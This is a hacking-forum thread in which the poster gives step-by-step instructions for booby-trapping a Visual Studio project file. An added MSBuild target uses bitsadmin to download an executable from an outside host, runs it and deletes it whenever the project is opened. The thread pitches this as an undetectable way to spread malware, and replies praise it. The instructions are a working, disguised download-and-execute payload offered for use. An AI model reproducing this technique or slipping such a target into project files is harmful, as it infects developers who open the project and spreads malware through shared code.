Sign in or Sign up

Visual Studio 0day Exploit [Spread Through Visual Studio] [FUD]
Started by Corruption


Rate this topic
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5


5 posts in this topic
Corruption Offline
Administrator
*******


Administrators
Posts: 291
Threads: 67
Joined: Fri Mar 2017

CZPoints: 119 CZP
04-18-2017, 02:12 AM -
#1
Step 1: Create a new project in visual studio
Step 2: Find the .vbproj/.csproj file and edit it
Step 3: On the second line, it should have something similar to this
PHP Code:
Code:
<Project ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> 


Edit this like to incluide
PHP Code:
Code:
InitialTargets="Build" 


The name can be whatever you want, I just thought "build" would be inconspicuous 
The final product will look like:
PHP Code:
Code:
<Project ToolsVersion="14.0" InitialTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> 


Step 4:

Add this to the end of the file, but before the closing "</project>" tag
PHP Code:
Code:
<Target Name="Buislfd">
    <Exec Command="bitsadmin.exe /transfer NAME http://directdownload.to/your.exe %temp%\1.exe" >
      <Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
    </Exec>
    <Exec Command="%temp%\1.exe" >
      <Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
    </Exec>
    <Exec Command="del %temp%\1.exe" >
      <Output TaskParameter="ExitCode" PropertyName="ErrorCode" />
    </Exec>
    <Message Importance="high" Text="$(ErrorCode)" />
  </Target> 


And save the file

Now, whenever someone runs opens your project in Visual Studio, it will download and exec your file.

Proof:


[Image: sx8YZix.gif]
Hi
deadeye Offline
Programmer
***


Registered
Posts: 247
Threads: 19
Joined: Sat Apr 2017
Reputation: 2

CZPoints: 28 CZP
HQMember
04-18-2017, 02:21 AM -
#2
Nice, thanks a lot for sharing this!
[Image: cw2gsbi.png]

Discord: deadeye#7164

Disclaimer: I have no idea what I'm talking about.
ScorpionOfWar Offline
Super Moderator
******


Super Moderators
Posts: 239
Threads: 11
Joined: Fri Mar 2017
Reputation: 14

CZPoints: 38 CZP
Contributor
04-18-2017, 04:40 AM -
#3
Thank you for the share! Thats cool
[Image: PWXNX5p.gif]

Discord - @ScorpionOfWar#0001
Bloodhound Offline
Python Enthusiast
****


Diamond
Posts: 105
Threads: 14
Joined: Thu Apr 2017
Reputation: 2

CZPoints: 6 CZP
ContributorDiamond
04-19-2017, 11:00 PM -
#4
This is actually something useful, however try not to do it on yourself xD
[Image: rElVjPf.png]
Dox Offline
Cyber Security Student
***


Contributor
Posts: 414
Threads: 125
Joined: Mon Oct 2017
Reputation: 6

CZPoints: 136 CZP
OnFireContributor
10-15-2017, 02:17 PM -
#5
I guess it's not much of a 0day exploit anymore... rip
Contact E-Mail: [email protected]
BTC Address: 1JmJrbmQn4Bg24r68bSyZ7TxNZGad3iPWM
[NS]DarkDude Offline
~# Nulled Systems #~
***


NulledSystems
Posts: 32
Threads: 5
Joined: Sun Oct 2017
Reputation: 3

CZPoints: 24 CZP
10-16-2017, 01:48 AM -
#6
new visual studio updates warn if its being used, as well as an extra precaution when you load remote projects




Users browsing this thread: 1 Guest(s)